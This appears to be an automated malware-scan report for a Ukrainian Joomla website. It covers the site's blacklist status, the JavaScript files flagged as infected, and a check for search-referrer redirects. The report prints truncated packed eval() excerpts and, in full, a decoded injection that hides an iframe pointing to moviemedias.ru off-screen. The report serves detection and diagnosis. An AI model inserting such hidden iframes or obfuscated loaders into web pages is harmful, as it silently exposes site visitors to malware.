Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mirasky.com.ua
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mirasky.com.ua/ | 200 OK Content-Length: 5727 Content-Type: text/html | clean |
http://mirasky.com.ua/plugins/system/2j_news_slider/jq_last.js | 200 OK Content-Length: 33439 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('(v(){B 87=1q.7;B 7=1q.7=v(M,1g){y 31 7.I.6m(M,1g)};B 8q=/^[^<]*(<(.|\\s)+>)[^>]*$|^#(\\w+)$/,6q=/^.[^:#\\[\\.]*$/,15;7.I=7.4O={6m:v(M,1g){M=M||S;k(M.18) Antivirus reports:
| ||
http://mirasky.com.ua/plugins/system/2j_news_slider/j.e.js | 200 OK Content-Length: 4656 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('h.i[\'1a\']=h.i[\'z\'];h.O(h.i,{y:\'D\',z:9(x,t,b,c,d){6 h.i[h.i.y](x,t,b,c,d)},17:9(x,t,b,c,d){6 c*(t/=d)*t+b},D:9(x,t,b,c,d){6-c*(t/=d)*(t-2)+b},13:9(x,t,b,c,d){e((t/ Antivirus reports:
| ||
http://mirasky.com.ua/plugins/system/2j_news_slider/jq.w.js | 200 OK Content-Length: 5230 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(6(A){A.2a.10=6(h){h=A.1I({U:1v,S:1v,R:1,1l:1,1k:\'1b\',1d:13,1u:13,L:1r,E:1Y,Q:1r,Y:1Q,1L:\'1K/1H/1E/1B/1e.29\',1y:13,1w:\'[ 1e ]\',J:\'22\',1t:\'21\',12:\'\'},h);6 1s Antivirus reports:
| ||
http://mirasky.com.ua/components/com_proofreader/js/proofreader.js | 200 OK Content-Length: 5672 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: moviemedias.ru var gecko; function keyPressInit(){ if (document.addEventListener){ document.addEventListener("keypress",function(e){keyAction(e)},true); if (navigator.appName == "Microsoft Internet Explorer") return; document.addEventListener("keydown", function(e){keyAction(e)}, true); gecko = true; } else if (document.attachEvent) { document.attachEvent("onkeydown", keyAction); } else { ...[4025 bytes skipped]... Decoded script: <div style="position:absolute; top:-508px;"><iframe src="http://moviemedias.ru/"></iframe></div> | ||
http://mirasky.com.ua/components/com_proofreader/js/xajax.js | 200 OK Content-Length: 18171 Content-Type: application/x-javascript | clean |
http://mirasky.com.ua/media/system/js/caption.js | 200 OK Content-Length: 3422 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = Antivirus reports:
| ||
http://mirasky.com.ua/plugins/system/pc_includes/ajax_1.3.js | 200 OK Content-Length: 10419 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: moviemedias.ru function Jax(){var loadingTimeout=400;var iframe;this.loadingFunction=function(){};this.doneLoadingFunction=function(){};this.stringify=function(arg){var c,i,l,o,u,v;switch(typeof arg){case"object":if(arg){if(arg.constructor==Array){o="";for(i=0;i<arg.length;++i){v=this.stringify(arg[i]);if(o&&(v!==u)){o+=","}if(v!==u){o+=v}}return"["+o+"]"}else{if(typeof arg.toString!="undefined"){o="";for(i in arg){v=this.stringify(arg[i]);if(v!==u){if(o){ ...[3587 bytes skipped]... Decoded script: <div style="position:absolute; top:-508px;"><iframe src="http://moviemedias.ru/"></iframe></div> | ||
http://mirasky.com.ua/test404page.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mirasky.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 11:42:21 GMT
Pragma: no-cache
Server: nginx/1.2.4
Vary: Accept-Encoding,User-Agent
Content-Length: 5727
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 04 Oct 2014 11:42:21 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 78ef23805ce829b7e520b8e008f40fe9=fqb55mhs1cb2qv0o15ds6lbrq5; path=/
X-Powered-By: PHP/5.3.27
...5727 bytes of data.
GET / HTTP/1.1
Host: mirasky.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 11:42:21 GMT
Pragma: no-cache
Server: nginx/1.2.4
Vary: Accept-Encoding,User-Agent
Content-Length: 5727
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 04 Oct 2014 11:42:21 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 78ef23805ce829b7e520b8e008f40fe9=fqb55mhs1cb2qv0o15ds6lbrq5; path=/
X-Powered-By: PHP/5.3.27
...5727 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mirasky.com.ua
Referer: http://www.google.com/search?q=mirasky.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mirasky.com.ua
Referer: http://www.google.com/search?q=mirasky.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.